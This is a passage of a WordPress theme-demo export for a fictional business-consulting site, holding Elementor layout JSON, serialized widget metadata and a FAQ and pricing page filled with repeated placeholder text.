"},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false},{"id":"0f844d1","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg2-value.jpg","id":549},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"100","right":"0","bottom":"105","left":"0","isLinked":false},"content_position":"bottom","padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"fc8acf7","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin":{"unit":"px","top":"0","right":"70","bottom":"0","left":"0","isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"f8ca7a4","elType":"widget","settings":{"sub":"main principles","title":"Global Reach with Local  Understanding","header_size":"h3","title_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"32","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"iheading"},{"id":"82ac6eb","elType":"widget","settings":{"ot_accs":[{"acc_title":"Exceptional Client Service","acc_content":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.<\/p>","_id":"74a73c1"},{"acc_title":"A Great Team and Winning Culture","acc_content":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.<\/p>","_id":"a8df8eb"},{"acc_title":"A Commitment to Integrity, Fairness","acc_content":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.<\/p>","_id":"dc09f20"}],"bg_title":"#A7A7A733","title_color":"#FFFFFF","bg_content":"#9C3D3D00","title_border":"#FFFFFF33","content_color":"#CCCCCC","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":14,"sizes":[]},"content_typography_typography":"custom","content_typography_font_size_mobile":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"iaccordions"}],"isInner":false},{"id":"21dc41a","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"e7a0c01","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-values-home3.png","id":1662},"image_size":"full","align_tablet":"left","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-30","isLinked":false},"_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"aebe74e","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg3-value.jpg","id":1971},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"117","right":"0","bottom":"110","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"c4c8174","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"e7309f3","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"afeb8de","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"18aa73e","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"fd1dd49","elType":"widget","settings":{"sub":"testimonials","title":"What People Say About Us","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":32,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"iheading"}],"isInner":true},{"id":"cb7d5c6","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"6734af5","elType":"section","settings":{"structure":"30","layout":"full_width"},"elements":[{"id":"31d8a18","elType":"column","settings":{"_column_size":33,"_inline_size":16.60000000000000142108547152020037174224853515625},"elements":[],"isInner":true},{"id":"284c1cf","elType":"column","settings":{"_column_size":33,"_inline_size":66.13200000000000500222085975110530853271484375},"elements":[{"id":"38f0ecc","elType":"widget","settings":{"testi_slider":[{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi1.png","id":1940},"tname":"Oliver Simson","tjob":"client of company","_id":"4b608b2"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi2.png","id":518},"tname":"Mary Grey","tjob":"Manager","_id":"f2a510a"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi3.png","id":519},"tname":"Samanta Fox","tjob":"Designer","_id":"2012bf3"}],"arrows":"true","dots":"false","loop":"true","arrow_spacing":{"unit":"px","size":-127,"sizes":[]}},"elements":[],"widgetType":"itestimonials2"}],"isInner":true},{"id":"3f45b25","elType":"column","settings":{"_column_size":33,"_inline_size":16.60000000000000142108547152020037174224853515625},"elements":[],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"8a829f1","elType":"section","settings":{"layout":"full_width"},"elements":[{"id":"0a0ed67","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"ae65e25","elType":"widget","settings":{"address":"411 University St, Seattle, USA","height":{"unit":"px","size":400,"sizes":[]},"css_filters_css_filter":"custom","css_filters_saturate":{"unit":"px","size":0,"sizes":[]}},"elements":[],"widgetType":"google_maps"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:14:{s:8:"iheading";a:3:{s:5:"count";i:4;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:4;s:5:"title";i:4;s:11:"header_size";i:4;s:5:"align";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_mobile";i:1;s:8:"_padding";i:3;}}s:5:"style";a:1:{s:13:"style_section";a:6:{s:9:"stitle_bg";i:4;s:27:"title_typography_typography";i:4;s:33:"title_typography_font_size_mobile";i:4;s:28:"stitle_typography_typography";i:4;s:27:"stitle_typography_font_size";i:4;s:11:"title_color";i:2;}}}}s:6:"column";a:3:{s:5:"count";i:31;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:2:{s:12:"_inline_size";i:31;s:19:"_inline_size_tablet";i:17;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:3:{s:13:"margin_tablet";i:8;s:13:"margin_mobile";i:2;s:6:"margin";i:4;}}}}s:11:"text-editor";a:3:{s:5:"count";i:5;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:5;}}s:5:"style";a:1:{s:13:"section_style";a:2:{s:5:"align";i:1;s:10:"text_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:3;}}}}s:7:"section";a:3:{s:5:"count";i:15;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:8;s:16:"content_position";i:5;s:6:"layout";i:7;}s:17:"section_structure";a:1:{s:9:"structure";i:10;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:5:{s:7:"padding";i:11;s:14:"padding_tablet";i:1;s:14:"padding_mobile";i:8;s:11:"_element_id";i:3;s:11:"css_classes";i:3;}}s:5:"style";a:1:{s:18:"section_background";a:6:{s:21:"background_background";i:4;s:16:"background_color";i:1;s:16:"background_image";i:3;s:19:"background_position";i:3;s:17:"background_repeat";i:3;s:15:"background_size";i:3;}}}}s:9:"iflip_box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:9:"image_box";i:3;s:4:"link";i:3;s:6:"number";i:2;s:5:"title";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_tablet";i:2;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:3;}}s:5:"style";a:2:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}s:18:"style_text_section";a:2:{s:27:"title_typography_typography";i:4;s:26:"title_typography_font_size";i:4;}}}}s:9:"itabtitle";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:11:"title_boxes";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:4:{s:12:"radius_title";i:1;s:8:"title_bg";i:1;s:18:"title_active_color";i:1;s:15:"title_active_bg";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:3:{s:5:"image";i:4;s:10:"image_size";i:4;s:12:"align_tablet";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:3:{s:32:"image_box_shadow_box_shadow_type";i:3;s:27:"image_box_shadow_box_shadow";i:3;s:19:"image_border_radius";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:1;s:14:"_margin_tablet";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:3;s:11:"header_size";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:3;}}}}s:8:"icon-box";a:3:{s:5:"count";i:6;s:15:"control_percent";i:8;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:5:{s:13:"selected_icon";i:6;s:10:"title_text";i:6;s:16:"description_text";i:6;s:8:"position";i:6;s:10:"title_size";i:6;}}s:5:"style";a:2:{s:18:"section_style_icon";a:4:{s:13:"primary_color";i:6;s:10:"icon_space";i:6;s:9:"icon_size";i:6;s:6:"rotate";i:6;}s:21:"section_style_content";a:10:{s:18:"title_bottom_space";i:6;s:11:"title_color";i:6;s:27:"title_typography_typography";i:6;s:28:"title_typography_font_family";i:6;s:28:"title_typography_line_height";i:6;s:17:"description_color";i:6;s:33:"description_typography_typography";i:6;s:34:"description_typography_font_family";i:6;s:34:"description_typography_font_weight";i:6;s:26:"title_typography_font_size";i:6;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:6;}}}}s:7:"ibutton";a:3:{s:5:"count";i:3;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:7:"content";a:1:{s:14:"button_section";a:1:{s:4:"text";i:3;}}}}s:11:"iaccordions";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:7:"ot_accs";i:1;}}s:5:"style";a:2:{s:11:"style_title";a:5:{s:8:"bg_title";i:1;s:11:"title_color";i:1;s:12:"title_border";i:1;s:27:"title_typography_typography";i:1;s:33:"title_typography_font_size_mobile";i:1;}s:13:"style_content";a:4:{s:10:"bg_content";i:1;s:13:"content_color";i:1;s:29:"content_typography_typography";i:1;s:35:"content_typography_font_size_mobile";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:8:"_padding";i:1;s:15:"_padding_tablet";i:1;s:15:"_padding_mobile";i:1;}}}}s:14:"itestimonials2";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:20:"section_testimonials";a:4:{s:12:"testi_slider";i:1;s:6:"arrows";i:1;s:4:"dots";i:1;s:4:"loop";i:1;}}s:5:"style";a:1:{s:9:"style_nav";a:1:{s:13:"arrow_spacing";i:1;}}}}s:11:"google_maps";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:11:"section_map";a:2:{s:7:"address";i:1;s:6:"height";i:1;}}s:5:"style";a:1:{s:17:"section_map_style";a:2:{s:22:"css_filters_css_filter";i:1;s:20:"css_filters_saturate";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[2030]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>FAQs</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/faqs/</link>
		<pubDate>Tue, 08 Sep 2020 09:22:44 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=566</guid>
		<description></description>
		<content:encoded><![CDATA[faqs	        <h3>Most Popular Questions</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
				In what areas do you provide management consulting? 
					<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention strategies.</p>				
				In which countries do you provide consulting services? 
					<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention strategies.</p>				
				How is a consulting project started and organized? 
					<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention strategies.</p>				
				Do you do fixed price or time and materials contracts? 
					<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention strategies.</p>				
				Do you offer volume or loyalty discounts? 
					<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.</p>				
				What problems does business consulting typically solve? 
					<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.</p>				
				How is the scope of a consulting project determined? 
					<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.</p>				
				How long does a business consulting project last? 
					<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.</p>				
			<h2>Looking for a First-Class Finance Firm?</h2>		
		<p>We welcome and celebrate different perspectives to help our firm, our clients and our people.</p>		
			<a href="http://wpdemo.archiwp.com/maxbizz/contact-us">get in touch</a>
	        flexible pricing plans	        <h3>Choose The Best Plan</h3>	    
		<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new.</p>		
            Billed Monthly
                <label>
                    <input type="checkbox">
                </label>
			Billed Yearly
				<h6>basic plan</h6>				<h2><sup>$</sup> 69</h2>				<p>month</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
				<h6>ultra plan</h6>				<h2><sup>$</sup> 79</h2>				<p>month</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
				<h6>pro plan</h6>				<h2><sup>$</sup> 89</h2>				<p>month</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
				<h6>basic plan</h6>				<h2><sup>$</sup> 699</h2>				<p>year</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
				<h6>ultra plan</h6>				<h2><sup>$</sup> 799</h2>				<p>year</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
				<h6>pro plan</h6>				<h2><sup>$</sup> 899</h2>				<p>year</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>566</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 09:22:44]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 09:22:44]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[faqs]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.15]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"1fad6c2","elType":"section","settings":{"padding":{"unit":"px","top":"117","right":"0","bottom":"120","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"cfef8fb","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"b29ca39","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"3d04547","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"ba86566","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"4865c99","elType":"widget","settings":{"sub":"faqs","title":"Most Popular Questions","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"iheading"},{"id":"f714140","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"af5bfe2","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"0e107ea","elType":"section","settings":{"gap":"extended","structure":"20","layout":"full_width"},"elements":[{"id":"531351e","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[{"id":"2e8ff7b","elType":"widget","settings":{"ot_accs":[{"acc_title":"In what areas do you provide management consulting?","acc_content":"<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention strategies.<\/p>","_id":"b0dc727"},{"acc_title":"In which countries do you provide consulting services?","acc_content":"<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention strategies.<\/p>","_id":"b4483e5"},{"acc_title":"How is a consulting project started and organized?","acc_content":"<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention strategies.<\/p>","_id":"f24ea6d"},{"acc_title":"Do you do fixed price or time and materials contracts?","acc_content":"<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention strategies.<\/p>","_id":"ceccd71"}],"_padding":{"unit":"px","top":"0","right":"10","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"iaccordions"}],"isInner":true},{"id":"a627a5f","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[{"id":"8463953","elType":"widget","settings":{"ot_accs":[{"acc_title":"Do you offer volume or loyalty discounts?","acc_content":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.<\/p>","_id":"b0dc727"},{"acc_title":"What problems does business consulting typically solve?","acc_content":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.<\/p>","_id":"5b50501"},{"acc_title":"How is the scope of a consulting project determined?","acc_content":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.<\/p>","_id":"2928abe"},{"acc_title":"How long does a business consulting project last?","acc_content":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.<\/p>","_id":"f4ae810"}],"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"10","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"iaccordions"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"84019eb","elType":"section","settings":{"gap":"extended","structure":"22","background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-faq.jpg","id":571},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"82","right":"0","bottom":"80","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false},"content_position":"middle"},"elements":[{"id":"6f925c9","elType":"column","settings":{"_column_size":66,"_inline_size":null},"elements":[{"id":"70c78a1","elType":"widget","settings":{"title":"Looking for a First-Class Finance Firm?","title_color":"#FFFFFF","typography_typography":"custom","typography_font_size":{"unit":"px","size":40,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"10","left":"0","isLinked":false},"typography_font_size_mobile":{"unit":"px","size":32,"sizes":[]}},"elements":[],"widgetType":"heading"},{"id":"a41d7e6","elType":"widget","settings":{"editor":"<p>We welcome and celebrate different perspectives to help our firm, our clients and our people.<\/p>","text_color":"#FFFFFF","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"152805f","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"c53e4ac","elType":"widget","settings":{"align":"right","align_mobile":"left","text":"get in touch","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/contact-us","is_external":"","nofollow":"","custom_attributes":""},"_padding":{"unit":"px","top":"5","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false},{"id":"dcefd1a","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg2-faq.jpg","id":2082},"background_position":"top center","background_repeat":"no-repeat","padding":{"unit":"px","top":"100","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"a866378","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"3d64e18","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"2d57f68","elType":"column","settings":{"_column_size":33,"_inline_size":23,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"2e06ec7","elType":"column","settings":{"_column_size":33,"_inline_size":53.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"c669db8","elType":"widget","settings":{"sub":"flexible pricing plans","title":"Choose The Best Plan","header_size":"h3","align":"center","title_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"23","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"iheading"},{"id":"7255b73","elType":"widget","settings":{"editor":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new.<\/p>","align":"center","text_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"48","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"51bfab0","elType":"widget","settings":{"title_left":"Billed Monthly","title_right":"Billed Yearly","title_color":"#FFFFFF","toggle_bg":"#FFFFFF33"},"elements":[],"widgetType":"iswitcher"}],"isInner":true},{"id":"06865b6","elType":"column","settings":{"_column_size":33,"_inline_size":23,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"04bd296","elType":"section","settings":{"gap":"extended","structure":"30","css_classes":"monthly","layout":"full_width"},"elements":[{"id":"75f58b9","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"5d1e07a","elType":"widget","settings":{"title":"basic plan","price":"<sup>$<\/sup> 69","price_for":"month","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li>Bank Transactions<\/li>\n<li>Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"price_typography_typography":"custom","price_typography_font_family":"Open Sans"},"elements":[],"widgetType":"ipricingtable"}],"isInner":true},{"id":"a910be5","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"14789ad","elType":"widget","settings":{"is_featured":"yes","title":"ultra plan","price":"<sup>$<\/sup> 79","price_for":"month","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li class=\"active\">Bank Transactions<\/li>\n<li>Financial 